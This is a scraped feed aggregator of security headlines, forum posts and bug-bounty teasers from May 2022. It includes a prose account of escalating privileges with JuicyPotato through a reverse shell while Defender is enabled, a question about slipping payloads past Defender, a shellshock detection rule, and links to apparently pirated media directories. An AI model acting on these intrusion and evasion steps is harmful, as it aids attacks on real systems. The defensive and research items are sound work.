    Hello all, I'm new into exploit development and I was wondering what common tools are used to fuzz gui applications. All the tutorials I have seen are used to fuzz command line applications. Thanks. submitted by /u/PuzzledWhereas991 [link] [comments]

  • Open

    Career in computer forensics pretty much over.. need some advice/support (more details in post)
    Hey all, long time lurker here. I’ve been in computer forensics for a bit now and loving it. But sadly something has happened recently that has well, shot my career in this field in the head. Quick background, I work in a state police child exploitation unit (won’t say exactly where, but western states and the weather is beautiful right now) doing forensics. Without getting into any details, it came about that not only myself but 15+ others I know were victimized when we were in middle school. It gets worse than that but that’s the spark notes. To say it’s been traumatic is an understatement. I haven’t been to work in a few weeks and I’ve had a chat with my boss and we both agree it’s not a job I can keep doing. I gotta chase down a bunch of stuff and I’m trying my best to take care of myself (seeing a therapist, gone straight edge, working with my doc, thank god for health insurance lol) but shits been rough man. Has anyone seen or experienced something similar? Any advice? Most importantly, computer forensics isn’t something I’m likely to have the capacity to do moving forwards given my mental state (worried about PTSD). Do you know of any fields with an easy lateral transition or transferable skill sets? I’ve been thinking of cyber security if I can swing it, but I’d rather stay gov’t if I can for the benefits as I’ll need them. submitted by /u/59472993757 [link] [comments]
    A starter's guide on recovering damaged and rotten CDs
    TL;DR: I'm Using ddrescue/dvdisaster/testdisk and photorec to recover data from a disc rotten CD Prettier version of this post is available here. The First Hurdle-Reading data from a Damaged CD / DVD The first problem anyone’s with a damaged disc going to encounter, is that they cannot copy files from it using a regular copying mechanism (eg:. file explorer, terminal commands). This is due to the fact that, normal file copying mechanisms will not attempt to read from a bad sector or unreadable data. Instead, they will freeze, or throw an error upon encountering such data. To recover data from a damaged medium, we need specialized tools that are aware of this problem and will continue with the reading process, even after encountering errors. Three of such tools are ddrescue , dvdisast…
  • Open

    Email Spoofing due to Invalid SPF Record Vulnerability
    Supp Folks! Continue reading on Medium »
    How I Paid For My Holiday With Bug Bounty
    Today I am detailing how I was able to afford a holiday utilising Bug Bounty only. Continue reading on Medium »
    P1 Bug — PII information disclosure
    Hello amazing penetration testers and bug bounty hunters, I hope you all are fine ❤ In this blog I will be explaining the bug that I… Continue reading on Medium »
    Can analyzing javascript files lead to remote code execution?
    In today’s blog, I’m going to show you how analyzing javascript files can lead to access unrestricted endpoints and to understand how the… Continue reading on Medium »
    How to Find bugs on Dutch Govt……..!
    i have posted my swag on social media n etc so getting lots of DM how we can find vulnerability (bug) in dutch govt sites what can be the… Continue reading on Medium »
    Nmap Basic commands — 1
    Introduction Continue reading on Medium »
    Dockerize your hacking workflow
    I’ve been a fan of containerization for a long time. I do not want to create a flame post; all I want to say is that there are situations… Continue reading on Medium »
    Html Injection Web Application Vulnerability : Introduction Part
    What Is HTML Injection? Continue reading on Medium »
    What happened to me
    Today I will write about one of my recent findings which lead to a $4000 bounty issue. I will publish at 11 PM IST. Continue reading on Medium »
    Worst Bug bounty sites you should avoid
    Hi Hunters! Continue reading on Medium »
  • Open

    What positions should a self-taught developer with 3 years experience in IT security apply to?
    Hi all, I have 3 years IT security experience (mix of auditing/compliance/user support) for a major company, and I am a self-taught developer (MERN stack). I have a degree unrelated to CS. I'm having trouble figuring out what positions to apply to. If I apply to web development positions, they don't seem to care about my IT/security background at all. It's basically just how well I know their (exact) stack. If I apply to security engineering positions, they seem to care more about what certs I have, networking knowledge, and things of that nature, and my programming skills don't seem as relevant. It feels like I'm not a perfect fit for either position. There must be a job title/position that utilizes my specific background. I'm curious about specific job titles and roles. submitted by /u/C4KggxcEJlTefYKisLJE [link] [comments]
    Transfer 2FA Tokens from GAUTH to Authy?
    Is this possible? I can duplicate the Tokens to another Instance of GAUTH for example on a 2nd smartphone via QR Codes. Can I also duplicate or export/import those tokens from GAUTH to authy? All I'd have to do is export the secret and type it into authy. But does the QR Code generated by GAUTH contain the secret ? ​ Thx for enlightening me. submitted by /u/junghansmega4 [link] [comments]
  • Open

    Mac Software, Images, Videos, and much more
    submitted by /u/ilikemacsalot [link] [comments]
    Music?
    Is music now off the table? Haven't seen any new posts for a while. submitted by /u/Top-Nefariousness908 [link] [comments]
  • Open

    SecWiki News 2022-05-08 Review
    智能电表安全之通讯分析 by ourren OffensiveNotion: Notion as a platform for offensive operations by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-08 Review
    智能电表安全之通讯分析 by ourren OffensiveNotion: Notion as a platform for offensive operations by ourren 更多最新文章,请访问SecWiki
  • Open

    HintInject
    Embedding shellcode into the PE Hint/Name Table https://github.com/frkngksl/HintInject submitted by /u/DarkGrejuva [link] [comments]
  • Open

    I started a newsletter and would love your feedback
    submitted by /u/nunorbatista [link] [comments]
  • Open

    Good News Roundup: the OSINT-inspired Geek Edition
    Today’s Good News Roundup has OSINT news, AI and robotics breakthroughs for health & human rights, & news about the Navalny app in Russia Continue reading on Medium »
    The Future of the Internet — METINT & METfluence?
    What is the future of OSINT, cyber HUMINT, and online influence? One only needs to look Mark Zuckerberg, who decided to rebrand Facebook —… Continue reading on Medium »
    NahamCon CTF 2022: OSINT Challenge
    NahamCon CTF 2022 is a gamified cyber security event and part of free virtual security conference Hosted by STOK, John Hammond and… Continue reading on Medium »
    Web Archive as an OSINT Tool
    Using web archives allows you to see what a web page or site looked like in the past. Most popular web archives: https://archive.org/… Continue reading on Medium »
    War in Ukraine / May 6
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    SPY NEWS: 2022 — Week 18
    Summary of the espionage-related news stories for the Week 18 (1–7 May) of 2022. Continue reading on Medium »
  • Open

    Reflected xss in https://sh.reddit.com
    Reddit disclosed a bug submitted by abhiramsita: https://hackerone.com/reports/1549206 - Bounty: $5000
  • Open

    IDOR: a simple and very dangerous vulnerability
    Hello guys! Continue reading on Medium »
    Everything you need to know about LSASS (From Red Team Perspective)
    If you open Task Manager in your windows, you will see a process running called ‘lsass.exe’. LSASS (Local Security Authority Server… Continue reading on Pentester Nepal »
    Everything you need to know about LSASS (From Red Team Perspective)
    If you open Task Manager in your windows, you will see a process running called ‘lsass.exe’. LSASS (Local Security Authority Server… Continue reading on Medium »

  • Open

    Hiding Your EXE In Alternate Data Streams
    submitted by /u/Diesl [link] [comments]
  • Open

    How advanced are (photo) image forensics at present?
    I am not in this field; I am a photographer/software person. I've been researching image forensics, but haven't quite got a straight answer on this: Is it plausible or even possible for someone to take a photograph with a digital camera, make edits to that photograph that make non-trivial changes to its appearance, and then hide these adjustments through technical skill, software designed for such a job or otherwise fudging EXIF info etc, resulting in an image that can't be identified as fake with forensic analysis, be it automated tools or even someone literally checking each block of data? submitted by /u/MonstrousPourings [link] [comments]
  • Open

    What caused Psychic Signatures Vulnerability (CVE-2022–21449)?
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe — Nessus
    No content preview
    Shellcode Analysis
    No content preview
    I Secured More Than 10 Million User's Data on the Kerala Government Website Maintained by NIC.
    No content preview
    C Language for Hackers & Beyond! 0x01
    No content preview
    India’s Biggest Hack — 1100+ Security bugs in Indian Government Websites and Servers compromised
    No content preview
  • Open

    What caused Psychic Signatures Vulnerability (CVE-2022–21449)?
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe — Nessus
    No content preview
    Shellcode Analysis
    No content preview
    I Secured More Than 10 Million User's Data on the Kerala Government Website Maintained by NIC.
    No content preview
    C Language for Hackers & Beyond! 0x01
    No content preview
    India’s Biggest Hack — 1100+ Security bugs in Indian Government Websites and Servers compromised
    No content preview
  • Open

    What caused Psychic Signatures Vulnerability (CVE-2022–21449)?
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe — Nessus
    No content preview
    Shellcode Analysis
    No content preview
    I Secured More Than 10 Million User's Data on the Kerala Government Website Maintained by NIC.
    No content preview
    C Language for Hackers & Beyond! 0x01
    No content preview
    India’s Biggest Hack — 1100+ Security bugs in Indian Government Websites and Servers compromised
    No content preview
  • Open

    Code4rena — First 1M$ stats
    After 14 months of grinding Code4rena audit contests I’m the first person to hit 1M$ in awards and take the number one spot on the… Continue reading on Medium »
    Text Based Injection | Content Spoofing on ISRO Website
    Content spoofing, also referred to as content injection, “arbitrary text injection” or virtual defacement, is an attack targeting a user… Continue reading on Medium »
    The $16,000 Dev Mistake
    Hello all! Continue reading on Medium »
    Remote Code Execution Web Application Vulnerability : Prevention Part
    Prevention Continue reading on Medium »
  • Open

    Mr.Holmes — Osint Tool
    Mr.Holmes é uma ferramenta de coleta de informações (OSINT). Seu objetivo principal é obter informações sobre domínios, nome de usuário e… Continue reading on Medium »
    Intelligence Gathering with Open-Source Tools
    Intelligence gathering is becoming increasingly important to organizations today. Continue reading on Medium »
    Collection of data about companies in Russia and around the world
    Today we will study publicly available sources that can be used to study Russian and foreign counterparties, as well as assess their… Continue reading on Medium »
    Cosa sarebbe l’OSINT senza… l’OSINT?
    Il titolo non vuole assolutamente essere clickbaiting ma un almeno po’ provocatorio si. A chi dovesse imbattersi nei risultati di una… Continue reading on Medium »
    War in Ukraine / May 5
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Storing Decryptable Passwords in DB for Automation Usage
    TLDR I am making a REST Session management solution for industrial automation purposes and need to automatically log into devices to perform configurations. NOTE: These devices are 99% of the time going to be isolated to private networks/VPNs (i.e., Will not have a public IP) Dilemma I am being tasked with creating a service that can store hardware device credentials so automated configurations (& metrics scraping) can be done. The hardware in question only allows REST Session logins via a POST method where the user and (unencrypted) password are sent in the message body. This returns a Session cookie that my service then stores (in memory). The service in question consists of a Linux (Ubuntu 20.04) server running: FastAPI python backend SQLITE3 embedded file DB Storing Credentials? My background is not in Security so this is all very new to me but it seems that I should prefer storing a hash (e.g., bcrypt) of my password in my DB for future verification however there will not be any future verification as this is all automated. This brings me to what seems like is the only solution - hashing the password and using that (somehow) to seed the password encryption, then storing the hashed password & encrypted password in the DB for decryption purposes later. I know this provides almost 0 security given the DB is compromised but I am at a loss for alternate solutions. Given the DB is embedded, maybe there is some added assurance that the server itself would have to be compromised before the DB itself is compromised? I don't know if there is a technical "right" approach to this, maybe not, however if anyone has any advice I am all ears.   NOTE: I do not control the authentication type for the devices my service has to authenticate to. User/Pass Session-based auth is the only way atm so JWT or token-based auth is out of the question submitted by /u/jmehrs [link] [comments]
    Trying to run JuicyPotato through a PowerShell script, but I get "recv failed with error: 10038"
    I have a reverse-powershell session to a Windows Server 2016 VM as the built-in IIS user (nt authority\iusr), and since the OS is vulnerable to this exploit, I'm trying to run JuicyPotato to execute a bat file as SYSTEM. However I am facing a problem: it looks like I can't create new processes, so uploading the exe and running it through my shell is not an option. The way I decided to solve this problem is by using the process I already have, the reverse powershell process. So I converted JuicyPotato into a DLL that exports the main() function, and I wrote a small PowerShell-compatible C# script that P/Invokes it and executes the exploit. But when I try to run it, I get the following error: COM -> recv failed with error: 10038 I know for a fact that using this exploit through PowerShell is possible, because I've tried it in a second VM with Defender disabled and it worked. I also know that the target system can create TCP listeners as the iusr user (the error seems to be a socket error), because that's how I have a fully functional reverse shell. So what gives? Looking at JP's source code, it looks like it failed to read from a TCP listener socket for some reason, but I don't understand why. Recreating this scenario for testing is very simple: Create a VM with Windows Server 2016 Datacenter Edition Configure IIS with PHP Make sure that Defender is enabled Drop a reverse-shell PHP script into wwwroot and connect to it Upload my modified JuicyPotato DLL and the ps1 script that runs it, or create your own by downloading the JP source code, change the output type to DLL and add this function to it. Run the ps1 script through your remote shell Any help is appreciated. submitted by /u/Sparky2199 [link] [comments]
    Offensive security, remote US jobs for an EU dude
    How feasible or likely is to find a job in US offsec sector (possibly remote) for someone who lives in Germany of EU citizenship? EDIT: Thanks everyone for all your answers, they are pretty much what I expected. Thinking of a mid-career transition into infosec from software engineering within next couple of years, so I walk around asking different infosec groups, perhaps stupid questions, but I wanted to make sure that I see all opportunities and all consequences of going for this change. submitted by /u/andy-codes [link] [comments]
  • Open

    Huge amount of Movies, TV Shows, and other Videos
    http://203.96.191.70/Data/ Has been posted before, but its back online again. submitted by /u/amritajaatak [link] [comments]
    A lot of nostalgia Flash games (fast download speed too)
    http://mahergames.ru.ma/uploads/ submitted by /u/Pelicaros [link] [comments]
  • Open

    SecWiki News 2022-05-07 Review
    使用 Sonarr 搭建自动化追番系统 by ourren flybirds: 基于自然语言的,跨端跨框架 BDD UI 自动化测试方案 by ourren 初探Java安全之JavaAgent by SecIN社区 supplier: 主流供应商的一些攻击性漏洞汇总 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-07 Review
    使用 Sonarr 搭建自动化追番系统 by ourren flybirds: 基于自然语言的,跨端跨框架 BDD UI 自动化测试方案 by ourren 初探Java安全之JavaAgent by SecIN社区 supplier: 主流供应商的一些攻击性漏洞汇总 by ourren 更多最新文章,请访问SecWiki
  • Open

    Default Credentials Cheat Sheet
    One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password Continue reading on Medium »
  • Open

    XXE 从0到1
    XML作为可扩展标记语言,在于任何应用中读/写数据,成为数据交换的公共语言。
    美国商务部机构建议这样生成软件供应链 “身*份*证”
    本手册概述了软件物料清单(SBOM)的生成流程,以及软件供应商提供它们的方式。
    对mssql提权原理的探索
    本次就这些提权方式的原理进行分析,做一个小结,有不妥之处希望各位师傅能指正。
    戟星实验室工具篇之人人都可以成为_弱密码大师_
    blaster是一款强大的弱密码隐患检测工具,用于网站登录弱密码检测。
    hackmyvm系列8——REI
    本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
    从防御者视角来看APT攻击
    本文会将APT防御方法分为三类,分别是:监控、检测和缓解技术,并分别进行梳理。
    研究人员警告:“Raspberry Robin”或正通过外部驱动传播
    近日,网络安全研究人员发现了一种新型Windows恶意软件,其具有类似蠕虫的功能。
    《网络安全标准实践指南——个人信息跨境处理活动认证技术规范(征求意见稿)》发布
    《实践指南》从基本原则、相关方在跨境处理活动中应遵循的要求、个人信息主体权益保障等方面提出了相应的要求。
    乌克兰 IT 军团和匿名者组织,持续攻击俄罗斯实体
    匿名者黑客组织伙同乌克兰 IT 军继续对俄罗斯实体发起网络攻击。
    QNAP修复了关键的QVR远程命令执行漏洞
    QNAP发布了几项安全公告。
    FreeBuf周报 | DNS漏洞影响数百万物联网设备;攻击者劫持英国家卫生系统邮件帐户
    各位FreeBufer周末好~以下是本周的「FreeBuf周报」。
    FreeBuf早报 | Xbox 在全球范围内出现故障;宜家加拿大发现数据泄露
    微软表示,Xbox Live 服务因严重中断而停机,全球多地客户无法启动或购买游戏。
    因未能披露挖矿对业务的影响,英伟达被罚550万美元
    英伟达承认未能充分披露挖矿对其游戏业务的影响,同意向美国证券交易委员会支付550万美元的罚款。
    什么是IP冲突以及如何解决?
    当同一网络上的两台或多台设备分配了相同的 IP 地址时,就会发生 IP 地址冲突。
    网安新势力solo发布季企业正式公布,5月9日上午10点准时起航!
    9家企业正式公布,网安新势力solo发布季下周一见!
    从《风起陇西》看企业数据安全
    时下“三国+谍战”题材电视剧《风起陇西》正在热播,在这个天下三分,烽烟四起的战场上,不仅有刀光剑影,秘密情报的交锋也涌动于滚滚洪流的阴影当中。
    【星课堂】快速入门:如何使用Suricata构建网络入侵检测系统?
    Suricata是一个免费、开源、成熟、快速、健壮的网络威胁检测引擎。
  • Open

    Exploiting IRCTC along with few other government domains through XXE
    submitted by /u/rotoutjog [link] [comments]
  • Open

    Pwn2Own Austin 2021 Cisco RV34x RCE 漏洞分析
    作者:f-undefined团队 f0cus7 原文链接:https://mp.weixin.qq.com/s/sxj7Yn9m2JolLkuP1BGc5Q 去年一整年Cisco RV34x系列曝出了一系列漏洞,在经历了多次修补之后,在年底的Pwn2Own Austin 2021上该系列路由器仍然被IoT Inspector Research Lab攻破了,具体来说是三个逻辑漏洞结合实现了R...
  • Open

    Pwn2Own Austin 2021 Cisco RV34x RCE 漏洞分析
    作者:f-undefined团队 f0cus7 原文链接:https://mp.weixin.qq.com/s/sxj7Yn9m2JolLkuP1BGc5Q 去年一整年Cisco RV34x系列曝出了一系列漏洞,在经历了多次修补之后,在年底的Pwn2Own Austin 2021上该系列路由器仍然被IoT Inspector Research Lab攻破了,具体来说是三个逻辑漏洞结合实现了R...
  • Open

    Fuzzing ClamAV with real malware samples
    Article URL: https://mmmds.pl/clamav/ Comments URL: https://news.ycombinator.com/item?id=31291190 Points: 2 # Comments: 0

  • Open

    KaijuKingz P2E Bug Bounty
    Introduction Continue reading on Medium »
    Remote Code Execution Web Application Vulnerability : File Inclusion Part
    File Inclusion Continue reading on System Weakness »
    Remote Code Execution Web Application Vulnerability : File Inclusion Part
    File Inclusion Continue reading on Medium »
    I Hacked all of the School Websites in my Town.
    So let’s begin the BLOG. When I got admission to my college,  I noticed that my school had a website. As a Website Pentester and a Curious… Continue reading on Medium »
    How We hacked (bypassed) Admin Panel just by Js file
    Hello world! Continue reading on Medium »
    2FA Bypass in PickMyCareer.in
    I found a 2fa bypass recently in a responsible disclosure program — pickmycareer.in . Continue reading on Medium »
    Zero-day vulnerability and money
    A simple definition would be that a zero-day vulnerability is a vulnerability in a system or device that is not yet patched. An exploit… Continue reading on Medium »
    Chained Bug: XML File Upload to XSS to CSRF to Full Account Take Over (ATO)
    Hello Community, today i’am gonna share my experience about how i able to chaining some vulnerabilities into Full Account Take Over… Continue reading on System Weakness »
    Chained Bug: XML File Upload to XSS to CSRF to Full Account Take Over (ATO)
    Hello Community, today i’am gonna share my experience about how i able to chaining some vulnerabilities into Full Account Take Over… Continue reading on Medium »
  • Open

    digital forensics..help
    Hey guys and gals. Years ago I was taking online classes for digital forensics... Never finished due to personal family issues.. had a two year old at the time and was working two jobs going to class at midnight one in the morning was really starting to take its toll... As the years of passed and my son is finally older I'm really thinking now is the time that I finish what I started... However I went to DeVry and they are currently under lots of fire... Could anyone recommend a free or relatively inexpensive online certification class or something that I could take to dip my toes back in the water?! Thank you in advance!! submitted by /u/Ok-Acanthaceae-4568 [link] [comments]
    Specifying GPG Decryption Key
    I'm working on a digital forensics project involving data recovery. Suppose I have the encryption key (not the passphrase, the actual key) for a file encrypted with GPG symmetric encryption and the encrypted file. How could I go about decrypting the file? Is there a way to specify the use of a specific key for GPG decryption instead of a passphrase? I've considered just trying to decrypt the file content with Python, but GPG uses its own variant of CFB mode, making this a somewhat complicated endeavor. submitted by /u/metal_oarsman [link] [comments]
  • Open

    Multiple IDORs in family pairing api
    TikTok disclosed a bug submitted by s3c: https://hackerone.com/reports/1286332 - Bounty: $7500
    SQL injection in URL path processing on www.ibm.com
    IBM disclosed a bug submitted by asterite: https://hackerone.com/reports/1527284
    Able to bypass email verification and change email to any other user email
    Reddit disclosed a bug submitted by bisesh: https://hackerone.com/reports/1551176 - Bounty: $5000
  • Open

    Cobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding
    Cobalt Strike’s metadata encoding algorithm contributes to its versatility and usefulness for red teams and threat actors alike. The post Cobalt Strike Analysis and Tutorial: CS Metadata Encoding and Decoding appeared first on Unit42.
  • Open

    Home-Grown Red Team: Creating A Red Team Development Workstation
    Having a good red team development workstation is essential for creating payloads, testing out new tools and keeping your work organized… Continue reading on Medium »
    My eCPPT journey
    Since I passed my eJTP in October, I decided to continue with INE and go for eCPPT(which can help for my oscp). Continue reading on Medium »
    Container breakout: CAP_SYS_ADMIN via Creating a cgroup
    Prerequisites: Continue reading on Medium »
  • Open

    Any ideas on how to search ODs for Shopify themes?
    They come in a zip file and always have these subfolders assets config layout locales sections snippets templates I don't know how I can narrow my search to those parameters, anyone know? submitted by /u/Loli_of_Bread [link] [comments]
  • Open

    SecWiki News 2022-05-06 Review
    域控被突破的几种途径 by ourren 自定义跳转函数的通用unhook方法 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-06 Review
    域控被突破的几种途径 by ourren 自定义跳转函数的通用unhook方法 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Rubygems CVE-2022-29176 explained
    Article URL: https://greg.molnar.io/blog/rubygems-cve-2022-29176/ Comments URL: https://news.ycombinator.com/item?id=31285049 Points: 2 # Comments: 0
  • Open

    CloudFlare Pages, part 1: The fellowship of the secret
    submitted by /u/albinowax [link] [comments]
    Fuzzing ClamAV with real malware samples
    submitted by /u/mmmds [link] [comments]
  • Open

    La vejez como catalizador del terror
    “Envejecer no está tan mal si tenemos en cuenta la alternativa” Continue reading on Medium »
  • Open

    Check and locate phone number in OSINT
    The first thing to do to identify a phone number is to establish its belonging to the region and telecom operator, and also to check its… Continue reading on Medium »
    OSINT: Do I have to Capture The Flag(CTF)? Pt1.
    Maybe I'll plant one instead! — make your own CTF Continue reading on Medium »
    War in Ukraine / May 4
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    CyberSoc | Cyber Investigator CTF Writeup
    CTF này được tạo bởi Jack T tại CyberSoc, Hiệp hội An ninh Mạng tại Đại học Cardiff. Đây là một sân chơi dành cho các bạn yêu thích về… Continue reading on Medium »
  • Open

    《北京市数字经济全产业链开放行动方案(征求意见稿)》发布,数据要素价值是关键
    为贯彻落实市委市政府关于加快建设全球数字经济标杆城市的战略部署,北京市经济和信息化局制定了《北京市数字经济全产业链开放行动方案(征求意见稿)》。
    白宫:破解量子计算机密码已准备就绪
    近日,美国总统乔•拜登签署了一份国家安全备忘录(NSM),旨在要求政府机构采取措施,减轻量子计算机对美国国家网络安全构成的风险。
    微软、苹果和谷歌将支持FIDO无密码登录
    微软、苹果和谷歌联合宣称,计划加大对万维网联盟和 FIDO 联盟开发的通用无密码登录标准的支持。
    谷歌修复了积极利用的Android内核漏洞
    近期谷歌发布了Android的5月安全补丁的第二部分,其中包括对积极利用的Linux内核漏洞的修复。
    数百万用户受影响,杀毒软件Avast中潜藏近10年的漏洞被披露
    5月5日,SentinelLabs 发布存在报告称,他们曾在知名防病毒产品Avast 和 AVG 中发现了两个时间长达近10年的严重漏洞。
    FreeBuf早报 | 新REvil勒索软件操作样本背后的奥秘;乌克兰战争主题文件成黑客首选
    美国国防部欺骗网络钓鱼者支付 2350 万美元。
    证监会发布《证券期货业网络安全管理办法(征求意见稿)》
    《办法》共八章六十六条,包括证券期货业网络安全监督管理体系、网络安全运行、数据安全统筹管理、网络安全应急处置等多方面内容。
  • Open

    Backdoor from HackTheBox — Detailed Walkthrough
    No content preview
    TryHackMe writeup: Atlas
    No content preview
    I have 1% chance to hack this company
    No content preview
    Clique Writeup — ångstromCTF 2022
    No content preview
  • Open

    Backdoor from HackTheBox — Detailed Walkthrough
    No content preview
    TryHackMe writeup: Atlas
    No content preview
    I have 1% chance to hack this company
    No content preview
    Clique Writeup — ångstromCTF 2022
    No content preview
  • Open

    Backdoor from HackTheBox — Detailed Walkthrough
    No content preview
    TryHackMe writeup: Atlas
    No content preview
    I have 1% chance to hack this company
    No content preview
    Clique Writeup — ångstromCTF 2022
    No content preview

  • Open

    【安全通报】F5 BIG-IP iControl REST 身份认证绕过漏洞(C...
    近日,F5 官方发布了 BIG-IP 产品的安全公告并曝光了一个远程身份认证绕过漏洞,未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访...
  • Open

    【安全通报】F5 BIG-IP iControl REST 身份认证绕过漏洞(C...
    近日,F5 官方发布了 BIG-IP 产品的安全公告并曝光了一个远程身份认证绕过漏洞,未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访...
  • Open

    From KBs to CVEs: Understanding the Relationships Between Windows Security Updates and Vulnerabilities
    submitted by /u/derp6996 [link] [comments]
    An Easy Misconfiguration to Make: Hidden Dangers in the Cloud Control Plane
    submitted by /u/ajohnston9 [link] [comments]
    The curious case of mavinject.exe
    submitted by /u/sciencestudent99 [link] [comments]
    A Deep Dive into AvosLocker Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    North Korea’s Lazarus: their initial access trade-craft using social media and social engineering
    submitted by /u/digicat [link] [comments]
  • Open

    Passed the GCFE exam today
    So glad to get this behind me, now I need to begin applying the information/knowledge and keep learning. submitted by /u/ATXChimera [link] [comments]
    A Deep Dive into AvosLocker Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Starting a DF business...how much work is out there?
    Title pretty much says it all. If someone wanted to be a principal consultant...how much work is out there? submitted by /u/invictusliber [link] [comments]
  • Open

    Creating a SNORT shellshock rule
    I’m creating a SNORT rule to block shellshock, every time I run this code, I get that it needs to be enclosed in ‘(‘ ‘)’. Like it is in brackets? What am I doing wrong? Alert tcp any any -> $HOME_NET 80 443 (msg: “Shellshock activated”; content: “() {“; sid: 10000000;) Any tips? submitted by /u/LewSm1th [link] [comments]
    Looking for SANS SEC 504 GCIH practice tests.
    Does anyone have any extras to share? submitted by /u/Striking-Regular-725 [link] [comments]
  • Open

    AMB Bridge: bug bounty program
    As you may already know, we have recently launched the AMB bridge on the Ambrosus testnet! Continue reading on Ambrosus Ecosystem »
    Remote Code Execution Web Application Vulnerability : Code Injection Part
    Remote code execution (RCE) occurs when an attacker can execute arbitrary code on a target machine because of a vulnerability or… Continue reading on System Weakness »
    Remote Code Execution Web Application Vulnerability : Code Injection Part
    Remote code execution (RCE) occurs when an attacker can execute arbitrary code on a target machine because of a vulnerability or… Continue reading on Medium »
    You should put scope over exploits! Or should you?
    Continue reading on Medium »
    I have 1% chance to hack this company
    Today I will share with you the first vulnerability I found on SerpApi, LLC. Continue reading on InfoSec Write-ups »
    My Pentest Log -17 - (Stack Trace in ASP.NET)
    Greetings from Perama to all, Continue reading on Medium »
    My First Bounty in Hackerone
    Hi my name is jagannath mohanty .i want to tell you my first bounty of hackerone lets jump the bug reported it was user/email enumeration… Continue reading on Medium »
  • Open

    What's everyone's favorite phishing framework/tool?
    I think GoPhish is the most popular. I'm going to be playing around with as many as I find over the weekend. I wanted to get some feedback on any favorites you may have used; pros & cons; etc. Thanks in advance for any feedback! submitted by /u/offftherecordz [link] [comments]
    The curious case of mavinject.exe
    submitted by /u/sciencestudent99 [link] [comments]
    What way is currently best for SE payload attacks?
    Microsoft did a huge crackdown on the "evil macros" on office docs about 9 months ago. https://www.zdnet.com/article/microsoft-...el-macros/ It now seems that ANY attempt of creating a shell object on VBS instantly gets flagged by windows defender. This used to be bypassed by using an "external" program to create such shell i.e: Outlook. So, how can I send my payload now? Sending exes in mail is frown upon by any spam agency and a plethora of alerts pop up when I do so. Sending a .bat is too sketchy as well and the .lnk trick has been also fixed. submitted by /u/ErikDz11 [link] [comments]
  • Open

    A brief introduction to OSINT (Open Source Intelligence)
    There are many different types of intelligence, but one that is used to be overlooked is open source intelligence (OSINT). Despite being… Continue reading on Medium »
  • Open

    SecWiki News 2022-05-05 Review
    RASP 如何检测Java Agent 内存马 by ourren 一文读懂https中密钥交换协议的原理及流程 by ourren UEBA(用户和实体行为分析)可以用来做什么(十大场景) by h4ck01 云安全基线 by h4ck01 Botconf 2022 议题速递 by Avenger 利用代码知识图谱实现Bug定位 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-05-05 Review
    RASP 如何检测Java Agent 内存马 by ourren 一文读懂https中密钥交换协议的原理及流程 by ourren UEBA(用户和实体行为分析)可以用来做什么(十大场景) by h4ck01 云安全基线 by h4ck01 Botconf 2022 议题速递 by Avenger 利用代码知识图谱实现Bug定位 by ourren 更多最新文章,请访问SecWiki
  • Open

    Manually Identifying an X-Cart Credit Card Skimmer
    During a recent investigation, a new client came to us reporting that their antivirus had detected a suspicious domain loading on their website’s checkout page. We regularly receive reports like these, as this is a telltale indicator of a credit card skimmer infection. Our research and remediation teams frequently find credit card skimmers on Magento websites, and more recently on WordPress — however, in this case the customer was using a lesser known eCommerce solution known as X-Cart. Continue reading Manually Identifying an X-Cart Credit Card Skimmer at Sucuri Blog.
  • Open

    DATA INDEXES | 100TB+ DATA COLLECTIVELY | ANIME,COURSES,MOVIES,GUIDES,DBS
    https://gdriveindex.mrdeveloper.workers.dev/0:/ https://mirror.mrha.tk/0:/ https://torrent2drive.video/0:/ https://punishermirror.punisher876.workers.dev/0:// https://sdfmirrorbot2.sdfmirror.workers.dev/0:/ https://sinnerdrive.jack-need-boost.workers.dev/0:// https://drive.movietrigger.workers.dev/0:/ https://arcrec.mark41stark.workers.dev/0:/ https://netflixcrew.rahulinstinct.workers.dev/0:/ https://mydrive.rahul112kapoor.workers.dev/0:/ https://td.lightdrive.workers.dev/1:/ https://otmbd01.sasohan.workers.dev/ https://animelibr.cooldude69.workers.dev/1:/ https://www.savage69.workers.dev/0:/ https://sauraj.rommirrorer.workers.dev/0:/ https://thanosdrive-v2.moviezclub-thanos...rs.dev/0:/ https://megamirrorsakura.iamrehan2064593...rs.dev/0:/ https://cloud.eleventh-hour.workers.dev/0:/ https://drive.spidercloud.workers.dev/1:/ https://sonic.otakus.workers.dev/0:/ https://one.thebayindex.tk/ submitted by /u/9NAAGRAAJ [link] [comments]
  • Open

    PyScript와 Security 🐍🗡
    최근 PyCon US 2022의 발표 중 PyScript가 공개되었습니다. PyScript는 HTML에서 Python 코드를 사용할 수 있도록 제공하는 라이브러리로 최근 엄청난 범용성과 낮은 러닝 커브를 가진 Python이 웹으로 확장하는 부분이라 관심도 많고 말도 많습니다. HMLT 내부에서 코드를 쓰는 방식이 PHP와 뭐라 다르냐란 이야기도 있습니다. 오히려 시대를 역행한다는 이야기도 봤던 것 같네요. 디자인 패턴이나 코드에 대한 내용은 개발자분들이 많이 신경쓰실 내용이고, 우리는 보안 엔지니어링이니 보안쪽 관점에서도 한번 살펴봐야해서 요 며칠 가볍게 고민해보고 글로 작성해봅니다.
  • Open

    微软NetLogon特权提升漏洞(CVE-2020-1472)深度挖掘
    该漏洞也称为“Zerologon”,CVSS评分为10.0,号称3秒撸域控,危害严重。
    深入了解Psexec与SMBexec
    从利用方式、日志分析等方面深入了解Psexec、smbexec。
